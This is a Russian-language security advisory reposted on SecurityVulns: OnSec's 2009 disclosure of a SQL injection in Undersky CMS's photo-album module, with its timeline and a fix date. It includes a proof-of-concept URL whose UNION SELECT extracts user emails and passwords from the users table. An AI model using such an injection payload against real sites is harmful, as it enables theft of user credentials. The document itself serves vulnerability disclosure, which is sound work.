Информационная безопасность
[RU] switch to English


Дополнительная информация

  Cводка уязвимостей безопасности в Web-приложениях (PHP, ASP, JSP, CGI, Perl)

  [SECURITY] [DSA 1897-1] New horde3 packages fix arbitrary code execution

  [ONSEC-09-017] Blogolet PHP including

  [ONSEC-09-016] Blogolet XSS

  [ONSEC-09-012] UMI.CMS Hash based Captcha

From:ONSEC
Date:28 сентября 2009 г.
Subject:[ONSEC-09-010] Undersky CMS SQL injection

[ONSEC-09-010] Undersky CMS SQL injection
Цель: Undersky CMS (http://www.undersky.ru)
Тип: SQL инъекция
Угроза: Высокая
Дата обнаружения: 03.07.2009
Дата оповещения разработчика: 03.07.2009
Дата выхода исправления: 05.07.2009
Автор: Vladimir Vorontsov
OnSec Russian Security Group (onsec [dot] ru)
Описание: Уязвимость существует в модуле фотоальбом. Отсутствие фильтрации символов в параметре albomid позволяет злоумышленнику осуществить произвольный SQL запрос и получить результат. Например, можно узнать личные данные пользователей.

http://demo.undersky.ru/foto.html?
albomid=1+AND+1=2+UNION+SELECT+1,email,3,
password,5,6,7,8,9,10,11,12,13,14,15,16,17
+FROM+users&p=1

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород